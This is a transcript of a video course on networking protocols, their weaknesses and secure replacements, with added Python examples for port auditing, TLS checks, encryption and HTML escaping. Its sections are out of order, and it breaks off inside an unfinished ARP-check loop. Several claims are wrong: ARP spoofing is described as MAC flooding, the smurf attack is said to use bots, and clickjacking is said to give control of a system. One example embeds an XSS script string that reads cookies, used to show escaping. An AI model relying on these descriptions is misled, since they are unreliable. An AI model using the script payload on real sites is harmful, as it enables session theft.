When you are sending data from one end to the other, which means from one device to another device, especially over the Internet, you need to make sure that you encrypt your data. Data sent in cleartext can be easily intercepted by any third party watching the traffic. You should also disable caching where it is not needed, because a cache can store a large amount of data. If somebody gets their hands on the cache of a particular web server or other server, that person may be able to retrieve not only data but also user credentials from it. Now, security misconfiguration is one of the most common mistakes made by web server administrators. They tend not only to give out access to individuals who don't require it, but also to add services which are not supposed to be running on that particular web server.
For instance, even if you have no use for FTP, an administrator might configure FTP alongside HTTP. That is not required. Why would you want to configure FTP if it is not required? Even though there is no data on it, that particular service can still be exploited. So in brief, security misconfiguration is often about accounts and defaults: systems may still be using the default accounts that exist out of the box, or running with the default configuration. For instance, you have just implemented a web server and it has a lot of services running which you don't require. If you don't require them, the best thing is to shut them down. And of course, it is not only the web server that can expose this kind of threat. You have to ensure the operating system on which the web server is running is hardened, that it does not run unnecessary services, and that it does not have open ports which are not required. So this type of mitigation has to come from the bottom up. First you ensure that your operating system is secured, then you ensure that your web server is secured, and then you move on to the web application which is being hosted and ensure that it is also secured. All three components must be secured.
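To make the "shut down what you do not need" advice a little more concrete, here is a small Python sketch that checks which of a handful of well-known ports answer on a host; the host and port list are assumptions for the example, and in a real audit you would compare the results against an approved service baseline rather than a hard-coded dictionary.

    # Quick service audit sketch: report which well-known ports accept connections.
    # Anything listening that is not on your approved list is a candidate to disable.
    import socket

    COMMON_PORTS = {21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP",
                    80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS"}

    def audit(host, ports=COMMON_PORTS, timeout=1.0):
        open_services = []
        for port, name in ports.items():
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:   # 0 means the connection succeeded
                    open_services.append((port, name))
        return open_services

    for port, name in audit("127.0.0.1"):
        print(f"Port {port} ({name}) is open - is this service actually required?")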
Weak Protocols and Their Replacements
[Video description begins] Topic title: Weak Protocols and Their Replacements.
The presenter is Ashish Chugh. [Video description ends]
Let's now look at some of the weak networking protocols and their replacements. The first one is Telnet. A little while back, we discussed that Telnet is a protocol that establishes a session with a remote host but sends the information in cleartext format; therefore, anybody can intercept the information. Its replacement protocol is SSH, which creates an encrypted tunnel and encrypts the information being sent from one host to the other. Then comes rsh, which is prone to eavesdropping and credential-stealing attacks. Again, the replacement for this protocol is SSH.
Moving on to rcp, which was used for copying files from one host to another. So one is your system, let's say, and the other is the remote host, and you would use the rcp command to copy files to and from that host. This, again, had the same problem because the information was sent in cleartext, and SSH is, again, the replacement for it. Then comes the rlogin protocol, which is mainly used on UNIX and works in a similar fashion to Telnet. Both have the same problem of sending the information in cleartext, so SSH again comes in as the replacement. Finally, you come to FTP, which is the File Transfer Protocol. A little while back, we discussed that FTP is prone to different types of security issues, such as FTP brute force attacks, anonymous authentication, and directory traversal attacks. Therefore, FTP is not a safe protocol to use when you're sending confidential and sensitive information over the Internet.
The best option is to use a secure form of FTP such as FTPS, which encrypts the information; it is essentially a bundle of FTP plus TLS. Then we come to HTTP. HTTP is acceptable for static sites that do not manipulate data or generate dynamic content, for instance a site where a search does not go back to a database and fetch information. But if you are using HTTP with any site that handles monetary transactions, or that queries and handles sensitive data, it is the wrong protocol to use, because it sends the information in cleartext format, which can be easily intercepted.
To give you an example, suppose you have hosted a website that contains a login page, and this website is served over HTTP. When you enter the username and password, somebody sitting on your network, or anybody who can access your transmission, can easily use a tool like Wireshark to intercept the data and figure out the username and password, because they will be captured in exactly the same form in which you typed them into the website. For example, if your username is admin and your password is password, the Wireshark capture will show that information, and the attacker will be able to easily read your user credentials. So as a replacement you can use HTTPS, which is HTTP plus TLS, the Transport Layer Security protocol. Now, when you use the same application with HTTPS, the information is encrypted and therefore is not visible when somebody intercepts the data flowing out of the web application.
SNMP was known for many vulnerabilities. Most of those vulnerabilities have been addressed in the latest version, which is SNMPv3. There are further enhancements happening to this protocol, but SNMPv3 is the most widely used secure version. Then you come to IMAP. There are now versions of IMAP that run over SSL or TLS. SSL should no longer be used because it has been broken multiple times, so the best option is IMAP over TLS. Similarly, POP3 can also be used with TLS or SSL; and as I just said, SSL has been broken many times, which means people have been able to break it and capture data from transmissions that were using it. The best thing to do is use TLS.
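If you want to see which protocol version a server actually negotiates, Python's standard ssl module can show you; this is a small illustrative check, and example.com is just a placeholder host name.

    # Check which TLS version and cipher suite a server negotiates.
    import socket, ssl

    host = "example.com"  # placeholder; substitute the server you want to test
    context = ssl.create_default_context()        # modern defaults, old SSL versions disabled
    with socket.create_connection((host, 443), timeout=5) as raw_sock:
        with context.wrap_socket(raw_sock, server_hostname=host) as tls_sock:
            print("Negotiated protocol:", tls_sock.version())   # e.g. 'TLSv1.3'
            print("Cipher suite:", tls_sock.cipher())

If the handshake fails or reports an old protocol version, the server is a candidate for the same kind of upgrade discussed above.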
Types of Security Protocols
[Video description begins] Topic title: Types of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at various types of security protocols. Before we do that, let's look at some common features of security protocols. First of all, a security protocol does not work on its own; it has to work with an underlying protocol. Take the example of HTTPS: HTTPS does not work on its own, it uses HTTP as the underlying protocol. Similarly, for FTPS the underlying protocol is FTP, and SFTP runs on top of SSH. So there always has to be a protocol with which the security protocol is bundled. One of the main reasons for using a security protocol is to ensure the data is protected, and that is done by preserving the integrity and the confidentiality of the data. Depending on which one you use, it may provide both, or it might provide just one of these properties, either integrity or confidentiality; it depends on the type of security protocol you use. In many cases, it can also secure the delivery of information: if you take a protocol like IPsec or SSH, it encrypts the information before sending it to the recipient, so the information is secured in transit. And of course, not all security protocols are the same in nature; some are used with messaging, some with web applications, and some for host-to-host communication. We will look at some of these now.
The first one to look at is IPsec, which is IP Security. It encrypts the communication between two hosts to ensure integrity and confidentiality. Then there is Transport Layer Security, which is TLS. It is mainly used with web applications to ensure data is encrypted between the web server and the client. OpenPGP is one of the standards for email encryption; it ensures privacy and integrity of messages. Then there is Secure Shell, which is SSH; we talked about SSH a while back. It creates an encrypted channel between your system and the remote host to which you want to connect, and then allows you to send information. Since the channel is encrypted, it cannot simply be intercepted via a man-in-the-middle, and nobody else can sniff that traffic. Then you have Secure/Multipurpose Internet Mail Extensions, known as S/MIME, which uses public key encryption and signs MIME data; it is mainly used for encrypting emails. Then we have Domain Name System Security Extensions, commonly known as DNSSEC, which protects caching resolvers and stops the manipulation of DNS data through cache poisoning. Then we move on to the Secure Real-time Transport Protocol, known as SRTP, which is used for packet encryption and also protects against replay attacks. Moving on, we have Network Time Protocol Secure, known as NTPsec, which is a security-hardened implementation of NTP. Then we have File Transfer Protocol Secure, known as FTPS. It is also known as FTP Secure, and it basically bundles TLS with FTP.
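As a quick illustration of the encrypted channel that SSH provides, here is a sketch using the third-party paramiko library; the host address and credentials are placeholders, and in production you would verify host keys instead of auto-accepting them.

    # Run a command over an SSH-encrypted channel using the third-party paramiko library.
    import paramiko

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # demo only; verify host keys in production
    client.connect("203.0.113.10", username="admin", password="example-password")  # placeholders

    stdin, stdout, stderr = client.exec_command("uptime")  # everything on the wire is encrypted
    print(stdout.read().decode().strip())
    client.close()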
Uses of Security Protocols
[Video description begins] Topic title: Uses of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the uses of security protocols. In totality, most of these security protocols are designed to protect information in whichever way possible: they may protect its integrity or its confidentiality, and they may encrypt the information to protect data in transit or data at rest. It depends on which security protocol you are using and how you're using it. One of the biggest uses is that when you are sending information, specifically over the Internet, you have to ensure that the information is encrypted, and you can use a security protocol to ensure this. Along with that, when the data is at rest, which means it is in storage on a server, the data also has to be encrypted. Information needs to be protected at all costs, and that is where security protocols come in: you encrypt the information, whether it is at rest or in transit, because you want to ensure the integrity and the confidentiality of the data. You do not want anybody who has not been given access to be able to read that information. Security protocols also help you secure application-level data transport, which means that if data is flowing out of an application, it needs to be secured; you have to build mechanisms like TLS into the application to ensure the data is encrypted. They also help you perform entity authentication, so anybody who is connecting, or attempting to connect, to a particular host or server can be authenticated with the help of a security protocol. And, of course, if your data is encrypted and secured, then you can prevent unauthorized access to it. Some examples of security protocols are the Secure File Transfer Protocol (SFTP), Hypertext Transfer Protocol Secure (HTTPS), and the Secure Sockets Layer (SSL), which has since been superseded by TLS.
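For data at rest, here is a minimal sketch using the Fernet recipe from the third-party cryptography package (symmetric, AES-based encryption); the file name is a placeholder and key handling is deliberately simplified for illustration.

    # Encrypt a small record at rest with Fernet (third-party 'cryptography' package).
    # Key handling is simplified; keep real keys in a proper secret store, not beside the data.
    from cryptography.fernet import Fernet

    key = Fernet.generate_key()          # store this key safely, separate from the data
    cipher = Fernet(key)

    plaintext = b"customer-card-on-file: 4111 1111 1111 1111"
    token = cipher.encrypt(plaintext)    # this is what you would actually write to disk

    with open("record.enc", "wb") as f:  # placeholder file name
        f.write(token)

    print(cipher.decrypt(token))         # recovery is only possible with the key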
Importance of Security Protocols
[Video description begins] Topic title: Importance of Security Protocols. The
presenter is Ashish Chugh. [Video description ends]
Let's now learn about the importance of security protocols. Security protocols help you prevent the loss of data integrity and confidentiality. Take the example of OpenPGP or S/MIME, which help you encrypt emails. Imagine those emails were carrying confidential data in transit and were not encrypted: they could be sniffed by anybody who has access to the network, or by anybody along the path if they were flowing over the Internet. Think about it, you could lose all your confidential and sensitive data. With the help of security protocols, you can prevent that loss. Similarly, if you're using a security protocol to keep data secure, you are allowing only the limited set of users who have been granted access to that particular data to access it. If a user does not have access to that particular folder on the network, they will not be able to read it, because you can simply encrypt the data and allow access to only a few individuals. Users who do not have that access will not be able to see the data. A simple example: you encrypt your own laptop using BitLocker. Once it is encrypted, unless you know the password and hold the key for the encryption, nobody else can access that data, so you are protecting not only the confidentiality but also the integrity of the data. And because you are able to protect data integrity and confidentiality, you're also protecting against data breaches and theft.
Let's assume your system is encrypted, your laptop is encrypted. Now if somebody
steals your laptop, what happens? It is gone with all the information you have, but
you need not worry because information is encrypted. It probably won't be possible
for that person to break that encryption and recover the data. And of course, with
the use of TLS in web applications, you can prevent attacks like man-in-the-middle
and sniffing. When you're using HTTP and somebody enters the user credentials in
the login page, anybody can sniff that. And if you're making a transaction while the
web application is still on HTTP, anybody can perform the MITM attack, which is
man-in-the-middle. Now if you've used HTTPS, both these types of attacks can be
prevented.
Data at rest is the data in storage; data in transit means the data is moving from your system, or from one system, to a remote host, whether over the Internet or over the intranet. You need not worry as much when the data is in transit on the intranet, but on the Internet you definitely do not want to send information in cleartext. If you are doing that, you are just inviting trouble. Therefore, it is always best to use a security protocol to encrypt that information before you send it. For instance, you can use SSH to create an encrypted channel and send the data, and you can secure communication between two devices using SSH. Or you could use IPsec to create encrypted tunnels between two hosts, one being yours and the other the remote host.
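Integrity protection on its own can be illustrated with an HMAC from Python's standard library: the receiver recomputes the tag with a shared key and rejects the message if anything changed in transit. The key and messages below are placeholders for the example.

    # Integrity check with an HMAC (standard library). A tampered message fails verification.
    import hmac, hashlib

    shared_key = b"placeholder-shared-secret"
    message = b"transfer 100.00 to account 12345"

    tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

    def verify(key, msg, received_tag):
        expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, received_tag)   # constant-time comparison

    print(verify(shared_key, message, tag))                               # True: message intact
    print(verify(shared_key, b"transfer 9999.00 to account 666", tag))    # False: integrity lost

Protocols such as TLS, SSH, and IPsec combine this kind of integrity check with encryption, which is why they protect both integrity and confidentiality at once.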
The Security-First Mindset
[Video description begins] Topic title: The Security-First Mindset. The presenter is
Ashish Chugh. [Video description ends]
A little earlier, we talked about security protocols: why they should be used, what their features are, and what their benefits are. Now, before we even get to the security protocols and their implementations, we need to have something called a security-first mindset. What is this security-first mindset all about? First, it unifies security and compliance, which means it not only helps you implement security, but also ensures your devices, your network, and your infrastructure are compliant with the security requirements you have adopted. For instance, you might be pursuing PCI DSS certification, which is a compliance framework. If you do not implement enough security and ensure that your devices and your infrastructure are compliant, you'll never get that certification, and you will never be able to comply with PCI DSS. Therefore, you have to ensure both security and compliance are unified. A security-first mindset also strengthens the security posture. If you're not talking about security, if you are not thinking about security in your organization, then there is no way security will become a critical priority for your organization, and the security posture will suffer because security will just be one of those things you have to do. That is not what a security-first mindset is about. It encourages everyone to play a key role: everybody, right from the senior management to the last employee in the hierarchy, has to think from a security perspective.
The role each person plays in the organization will vary; therefore, the responsibilities they have under a security-first mindset will differ. For instance, a user lower in the hierarchy would have to comply with certain rules and regulations, whereas senior management has a critical role to play when implementing a security-first mindset: they have to make strategic decisions, and they also have to set an example for the other users. They have to think from a security perspective, and they have to ensure that security is the highest priority for everybody in the organization.
Now, when security is your first and highest priority, it will keep your business running safely. Given today's Internet environment, there are thousands of malware samples being created every day, new attackers keep appearing, and there are people who are not only hungry for information but hungry to steal that information and sell it on the black market, known as the underground or dark web. Therefore, to ensure that everybody is sensitive about security, you have to ensure that it drills down from the top to the bottom of the organization. With this approach, it will keep your business running safely.
You will also have to bring innovation to keeping information safe; you cannot live with an outdated security infrastructure. There is new malware coming out, and there are new threats coming up every day, so you will have to keep evolving your infrastructure. You have to be innovative. Think like a hacker, because only then can you tackle a hacker; if you're two steps behind the hacker, there is no way you can keep your information safe. So what does a security-first mindset require? It has to be integrated with multiple components of your organization. It has to start with your business vision and mission. While your vision and mission focus on the business of the organization, they also have to address the security problem, because if your organization wants to grow and ensure data safety, it has to start aligning its business vision and mission with security.
Then come the people. People are the most critical link in the security chain, and they are also the weakest link in that chain. Therefore, people have to be trained properly in the security domain and made aware of the basic threats and how to mitigate them. The training you provide to users cannot be a one-time exercise; it has to be ongoing, so that whenever there is a change in your organization's security posture, you ensure the users are trained on it. Then come the processes and procedures. Many organizations do not align their processes and procedures with security.
You have to ensure that any process or procedure running in your organization is looked at from the security point of view. For instance, suppose your client requires confidential data to be uploaded to an FTP server. If your process allows you to upload that data without security being considered, anything can happen: somebody can hack the FTP server and take away the data. So one process or procedure could be that you will not use that FTP server; there is an in-house FTPS server that has been implemented, and you will use that to upload the data. Now you have ensured that the processes and procedures are aligned with security. You also have to consider not only your own organization but the partners you're dealing with. If your partners are not equipped with enough security and they connect to your network, rest assured that sooner or later attackers are going to reach your network as well; it will not be your fault, but it will be the partner who has invited the trouble.
Then there are your various organizational units. Every organization has multiple organizational units, and each one may have different security problems and different security needs; you have to ensure they are addressed. Your marketing and sales teams also have to be kept up to date with the latest security posture and apprised of what is going on within the organization as far as security is concerned. So in totality, you have now covered most aspects of the organization, and if you integrate all of them with security, then you are talking about a security-first mindset. But how do you implement a security-first mindset?
[Video description begins] Security-first Mindset - How? [Video description ends]
The biggest question is, how? And the easiest answer is, make sure your security decisions are taken early on. For every project you do, every new process you implement, and every change you make to the infrastructure, make sure you consider security; security has to be integrated into every decision you make. It cannot be that you set up a new network without having thought about security and only afterwards ask, how do I secure this network? That is not going to work.
Therefore, you'll be able to make the right decision at the right time. You've to also
ensure security is tightly integrated into your business, just like the good old era
security cannot be isolated anymore, it cannot run in silos. Your business has to
integrate security tightly, which means your top management or the senior
leadership has to start talking about the security. If they want to secure the business
and its information. And it is also important, even though you may not be required
to opt for a compliance program. But it is also equally important that you should
align your security policies and everything to a compliance program, even though
you don’t go and get yourself certified. But being compliant is always good. This is
because your partners, your vendors, your clients will have more trust in you if you
have complied to a security standard. Maybe it could be PCI DSS if you are into
credit card transactions or it could be as generic as ISO 27001. Depending on your
requirement, make sure you have compliance implemented within your
organization.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of security protocols and to learn how they play a key role in network security. We did this by covering the common protocols and their security vulnerabilities. We also looked at the risks around certain networking protocols, and at security protocols as replacements for the legacy ones. Moving on, we also looked at security protocols and their usage. Finally, at the end, we looked at the importance of the security-first mindset. In our next course, we will move on to explore hardened security topologies and their importance.
Information Security: Securing Networking
Protocols
Learners can explore the key concept of the common protocols in use, and discover
the security issues of the transmission control protocol/Internet protocol (TCP/IP)
model and security protocols, in this 10-video course. You will begin by taking a
look at the common protocols used in a network, the ports they use, and the type
they are and what they do. Next, you will examine some of the security issues of
the TCP/IP model at the layer level, of which it has four: application, transport,
Internet, and data link. You will also explore the threats, vulnerabilities, and
mitigation techniques in network security; identify the types of weak protocols and
their replacements; and classify the various types of security protocols. Then
learners will continue by examining various ways to use security protocols in
different situations; the importance of implementing security protocols. In the final
tutorial, learners will explore the security-first mindset and its necessity.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT infrastructure operations, software development, cyber security, and e-learning. In the past, I have worked in different capacities in the IT industry: as a Quality Assurance Team Leader, Technical Specialist, IT Operations Manager, and Delivery Head for Software Development. Along with this, I've also worked as a Cyber Security Consultant. I have a Bachelor's Degree in Psychology and a Diploma in System Management. My areas of expertise are IT operations and process management. I hold various certifications, including Certified Network Defender, Certified Ethical Hacker, and Computer Hacking Forensic Investigator. Other than these, I also have a few certifications from Microsoft, namely MCSE, MCSA, and MCP, and I'm a Certified Lotus Professional.
In this course, we will learn about the common networking protocols and their security vulnerabilities. We will also focus on the risks around certain networking protocols. Then we will look at common security protocols and how they are used on a network. Finally, we'll also learn about the security-first mindset.
Common Protocols
[Video description begins] Topic title: Common Protocols. The presenter is Ashish
Chugh. [Video description ends]
When we talk about a protocol, it is a method of doing something in a way that two parties can both understand. Similarly, in networking, a protocol is a set of rules that defines the communication between two or more devices. A protocol also defines the format of the messages exchanged between those devices. For example, think about two human beings, one who knows German and one who knows French. They will not be able to communicate with each other unless either both of them speak German or both of them speak French. A protocol works in a similar fashion on a network: two devices that need to speak to each other need to have a common protocol. This common protocol could be anything; as long as both devices are using the same one, they will be able to communicate with each other. A protocol can be implemented by software, by hardware, or by both. It is not only software that can implement a protocol; even two hardware devices, when they need to communicate, need a common protocol.
[Video description begins] Common Protocols. [Video description ends]
So let's now look at some of the common protocols and the ports they use, and the
type they are, and what they do. So first one is File Transfer Protocol, which is
FTP.
[Video description begins] The type for File Transfer Protocol is TCP and the port
is 20/21. It is used for transferring files between a server and a client. [Video
description ends]
FTP is a very common protocol that is mostly used for uploading and downloading files. If you need to exchange files with multiple clients, you can simply set up an FTP server and upload the files. Users who have credentials for the FTP server can then access those files, or you could enable anonymous authentication, which means anybody who knows the IP address or the FTP server name can connect to it and download the files. Then you have something called Secure Shell, very commonly known as SSH. It is a TCP type protocol and works on port 22. When you need to establish a remote session with a system in a very secure way, which means the session needs to be encrypted, you can use SSH. Telnet, on the other hand, works in a similar fashion to SSH; however, it does not create an encrypted session, and all the information that travels over the channel established by Telnet is in cleartext format. Then we come to the Simple Mail Transfer Protocol, which is known as SMTP.
[Video description begins] The type for Telnet protocol is TCP and the port is 23. It
is used for establishing a remote connection to a device. [Video description ends]
It is a TCP type protocol, works on port 25, and is mainly used for sending emails. So when a client sends an email, it is using SMTP. Then, no network can work without DNS unless it has no need for name resolution at all. DNS is both a TCP and UDP type protocol, works on port 53, and is mainly used for name resolution. For instance, if you type www.google.com, there has to be a mechanism that can translate this domain name into an IP address; that is the role DNS plays. Next comes the Dynamic Host Configuration Protocol, which is DHCP. It is a UDP type protocol and works on ports 67/68; it uses both ports, one for sending the request and one for receiving the IP address. It is mainly used for distributing IP addresses on the network.
[Video description begins] The Dynamic Host Configuration Protocol is used for
leasing IP addresses to the clients on a network. [Video description ends]
You have to define a pool of IP addresses that can be leased out to the clients on the network. Once the IP pool is exhausted, clients will not be able to obtain an IP address; therefore, whenever you create a DHCP server, you have to ensure that there are enough IP addresses available to lease out. Then comes the Trivial File Transfer Protocol, known as TFTP. It is a UDP type protocol and works on port 69. It is mainly used for transferring files between two devices, and the biggest thing about this protocol is that you don't have to establish a session. It is commonly used with routers and switches when you have to upload a certain file, such as an update or a flash ROM image; if you need to upload something to routers and switches, you normally use TFTP.
Then comes the Hypertext Transfer Protocol, very commonly known as HTTP. It is a TCP type protocol and works on port 80. Any time you browse a website, it is using port 80 by default, unless you are using HTTPS, which uses port 443. However, you do not have to add this port at the end of the website name or URL, because if the web browser doesn't find a port number, it will by default assume that the request is being sent to port 80 when HTTP is being used.
Next is the Post Office Protocol, which is known as POP. There have been several versions; the current one is version 3, and versions 1 and 2 came earlier. It is a TCP type protocol and works on port 110. It is mainly used for downloading emails from a messaging server, but once it downloads the emails, it deletes them from the messaging server. Then comes the Network Time Protocol, which is known as NTP. It is a UDP type protocol, works on port 123, and is used by all devices on a network to synchronize their time with the NTP server. Your organization can set up an NTP server internally on its network, or it could be an NTP server somewhere on the Internet; there are open NTP servers that can be used to synchronize time.
Let's now talk about the Internet Message Access Protocol, which is known as IMAP. It is a TCP type protocol and uses port 143. It is also used to download emails from a messaging server. The difference between POP3 and IMAP is that where POP3 deletes the emails from the messaging server, IMAP does not do that: it retains one copy on the messaging server and also downloads a copy to the client desktop or laptop. Then you have the Simple Network Management Protocol, which is known as SNMP. This is a TCP/UDP type protocol and uses ports 161 and 162. It is mainly used for monitoring devices on the network. Then you have the Border Gateway Protocol, known as BGP.
[Video description begins] The Simple Network Management Protocol is used for
monitoring, configuring, and controlling network devices. [Video description ends]
It's a TCP type protocol and uses port 179. BGP is mainly used for maintaining the routing tables on the Internet. Finally, we come to the Lightweight Directory Access Protocol, very commonly known as LDAP. It is a TCP/UDP type protocol and uses port 389. It is used to access a centralized repository that maintains information about users, computers, groups, and various other types of objects. Active Directory is one of the most commonly known implementations of LDAP.
[Video description begins] The Lightweight Directory Access Protocol helps to
access and maintain distributed directory information. [Video description ends]
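If you want to double-check these well-known port assignments on your own machine, Python's standard library can read them from the local services database; this is just a convenience sketch, and a couple of the names may differ depending on what your platform's services file calls them.

    # Look up well-known ports from the local services database (e.g. /etc/services).
    import socket

    for name in ["ftp", "ssh", "telnet", "smtp", "domain", "http", "pop3",
                 "ntp", "imap", "snmp", "bgp", "ldap"]:
        try:
            print(f"{name:8} -> port {socket.getservbyname(name)}")
        except OSError:
            print(f"{name:8} -> not listed in the local services database")

Note that "domain" is the service name the database uses for DNS on port 53.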
Security Issues of TCP/IP Model
[Video description begins] Topic title: Security Issues of TCP/IP Model. The
presenter is Ashish Chugh. [Video description ends]
Now, moving ahead, we will also look at the security issues of the TCP/IP model. This model has four layers: application, transport, internet, and data link. Each layer has a certain number of protocols that work on it. For instance, the application layer has the largest number of protocols running on it, including DNS, DHCP, TFTP, and FTP; just a while back we talked about most of these protocols. Then we come to the transport layer, which has the TCP and UDP protocols.
[Video description begins] Application layer includes the following protocols:
DNS, DHCP, TFTP, FTP, HTTP, IMAP4, POP3, SMTP, SNMP, SSH, Telnet,
TLS/SSL. [Video description ends]
Moving on to the Internet layer, two versions of IP work here, IPv4 and IPv6. Other than that, you have the ICMP protocol, which is mainly used with the ping command, and IGMP. The data link layer has the ARP protocol.
[Video description begins] Security Issues of TCP/IP Model - Application
Layer. [Video description ends]
Let's now look at some of the security issues with the protocols that exist on the application layer. When you talk about HTTP, you have various types of security issues, ranging from caching and replay attacks to cookie poisoning, session hijacking, and cross-site scripting. We are not going to go into detail on every type of security issue, but we will talk about at least one or two of them. Let's talk about session hijacking, which is also known as cookie hijacking. It is the method of exploiting a valid session to gain unauthorized access to information or a service. Then comes cross-site scripting, very commonly known as XSS. This is a type of attack in which the attacker injects malicious client-side scripts into web pages. These client-side scripts are then downloaded to, and executed on, the systems of users who visit that particular web page.
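A minimal defense against that kind of script injection is to escape user-supplied text before writing it into a page, so an injected script tag is rendered as harmless text rather than executed. Here is a small sketch using Python's standard html module; the comment string is just an example payload.

    # Escape user-supplied text before placing it in a web page so injected
    # script tags show up as text instead of running in the visitor's browser.
    import html

    user_comment = '<script>alert("stolen cookie: " + document.cookie)</script>'
    safe_comment = html.escape(user_comment)

    print(safe_comment)
    # &lt;script&gt;alert(&quot;stolen cookie: &quot; + document.cookie)&lt;/script&gt;

Real web frameworks apply this kind of escaping automatically in their template engines, but only if you do not bypass it.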
When you come to DNS, again, just like HTTP, there are various types of security issues. Let's talk about DNS cache poisoning.
[Video description begins] The various types of security issues with DNS are as
follows: DNS Spoofing, DNS ID Hijacking, DNS Cache Poisoning, DNS Flood
Attack, and Distributed Reflection Denial of Service(DRDos). [Video description
ends]
It is also known as DNS spoofing. In this attack, an attacker alters DNS records to divert Internet traffic from legitimate servers to malicious ones. The problem with this type of attack is that it can spread from DNS server to DNS server: when DNS data is shared or replicated between servers, the poisoned entries can be passed along, and you end up copying invalid cache data to other servers. Let's now talk about the DNS flood attack, which is a type of denial of service attack in which an attacker sends a large number of requests to the DNS server until its resources are consumed and it is too exhausted to serve any more queries. Moving on, let's talk about FTP. FTP has various types of attacks, just like HTTP and DNS. One is the FTP brute force attack, in which the passwords of FTP accounts are brute forced so they can be revealed and the FTP server can be accessed.
[Video description begins] The various types of security issues with FTP are as
follows: FTP Bounce Attack, FTP Brute Force Attack, Anonymous Authentication,
Directory Traversal Attack, and Dridex-based Malware Attack. [Video description
ends]
Then you have the directory traversal attack, in which an attacker gains access to restricted directories on the FTP server that should not be reachable. Moving on, when you talk about Telnet, there is the sniffing attack.
[Video description begins] The various types of security issues with Telnet are as
follows: Sniffing, Brute Force Attack, and Denial of Service(Dos). [Video
description ends]
Telnet sends its traffic in cleartext format, which means it can be easily intercepted and read by the attacker; this type of attack is known as sniffing. Telnet is also prone to denial of service, or DoS, attacks. These are a couple of the main security issues with the Telnet protocol. Then if you look at DHCP, again, there are various types of security issues. One is DHCP starvation.
[Video description begins] The various types of security issues with DHCP are as
follows: DHCP Spoofing, DHCP Starvation, Rogue DHCP Server. [Video
description ends]
In DHCP starvation, an attacker sends a lot of forged requests to the DHCP server to exhaust its IP pools. Bogus or rogue requests are sent to the DHCP server, and the server keeps leasing out IP addresses until it runs out of addresses in its pool. Then comes the rogue DHCP server attack, in which an attacker or a user on the network sets up an unauthorized DHCP server that starts to lease out IP addresses. There is already a legitimate DHCP server leasing out IP addresses, but now this rogue DHCP server also starts leasing addresses to nearby clients, and its reach gradually spreads, so clients start accepting IP addresses from the rogue server's pool.
[Video description begins] Security Issues of TCP/IP Model - Transport
Layer. [Video description ends]
When you talk about TCP, there is the SYN attack, which is a type of denial of service attack.
[Video description begins] The various types of security issues with TCP are as
follows: SYN Attack, TCP Land Attack, TCP Sequence Number Prediction, IP Half
Scan Attack, and TCP Sequence Number Generation Attack . [Video description
ends]
An attacker sends a large number of SYN requests to a server. The server attempts to respond to every single request and therefore runs out of resources and crashes or freezes; that is the outcome of the SYN attack. Now, the TCP land attack is a layer 4 denial of service attack in which the attacker sends spoofed TCP SYN packets whose source and destination IP addresses are the same. When the attacker sends these TCP SYN packets to a server, the source address and the destination address are both set to the server's own address. When the server receives the request and attempts to respond, the reply goes back to itself, because the address the packet came from is the same as the one it was sent to. The server effectively gets confused, keeps consuming resources, and eventually crashes. When you talk about UDP, there is the UDP flood.
[Video description begins] The various types of security issues with UDP are as
follows: UDP Flood, UDP Amplification, NTP Amplification, and Volume Based
Attack. [Video description ends]
It is a denial of service attack in which an attacker sends UDP packets to a server, and the result is the same: the packets arrive in large quantities, and eventually the server exhausts its resources and crashes or freezes. Then you have the NTP amplification attack, which is a distributed denial of service attack in which the attacker exploits NTP servers with UDP packets to overwhelm a target.
[Video description begins] Security Issues of TCP/IP Model - Internet
Layer. [Video description ends]
Then we come to IP. When you talk about HTTP flooding, it is a distributed denial
of service attack in which an attacker sends out a large number of HTTP requests to
attack a web server or a web application.
[Video description begins] The various types of security issues with IP are as
follows: SYN Attack, HTTP Flooding, IP Spoofing, Brute Force Attack, and
Clickjacking. [Video description ends]
Eventually, whichever one is being attacked attempts to respond to these requests and ends up exhausting the server's resources until it crashes. Then you have the clickjacking attack, in which an attacker embeds a malicious link that is hidden on the webpage; when the user clicks on the malicious link, the attacker can take control of their system. Moving on to ICMP.
[Video description begins] The various types of security issues with ICMP are as
follows: Fraggle Attack, Smurf Attack, and ICMP Tunneling Attack. [Video
description ends]
There is the smurf attack, a distributed denial of service attack in which the attacker, using several hundred bots, sends ICMP packets with a spoofed IP address. This means you have no way of getting back to or tracing the attacker, because every request is coming from a spoofed IP address. Then you have IGMP, which is prone to distributed denial of service (DDoS) attacks.
[Video description begins] The various types of security issues with IGMP are as
follows: Distributed Denial of Service(DDos) and Multicast Routing. [Video
description ends]
DDoS uses hundreds, thousands, or even millions of bots, which are known as zombie systems, to attack a particular server. Because the server is receiving requests from hundreds and thousands of bots across the Internet, it cannot handle those requests and eventually crashes.
[Video description begins] Security Issues of TCP/IP Model - Data Link
Layer. [Video description ends]
Now, moving on to ARP. When you talk about ARP, there is ARP spoofing, in which the attacker sends a large number of Ethernet frames with fake MAC addresses to a switch.
[Video description begins] The various types of security issues with ARP are as
follows: Connection Resetting, Man in the Middle (MITM), Packet Sniffing, Denial
of Service (DoS), ARP Cache Poisoning, MAC Address Flooding, and ARP
Spoofing. [Video description ends]
Eventually this fills the switch's tables with spoofed entries, and the switch is no longer able to cater to legitimate requests.
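One simple heuristic for spotting ARP spoofing on a host is to look for a single MAC address that claims more than one IP address in the local ARP cache. The sketch below reads /proc/net/arp, so it is Linux-specific and purely illustrative.

    # Linux-only sketch: flag MAC addresses that appear against more than one IP
    # in the local ARP cache, a common sign of ARP spoofing.
    from collections import defaultdict

    macs = defaultdict(set)
    with open("/proc/net/arp") as arp_table:
        next(arp_table)                              # skip the header row
        for line in arp_table:
            fields = line.split()
            ip_address, mac_address = fields[0], fields[3]
            if mac_address != "00:00:00:00:00:00":   # ignore incomplete entries
                macs[mac_address].add(ip_address)

    for mac_address, ips in macs.items():
        if len(ips) > 1:
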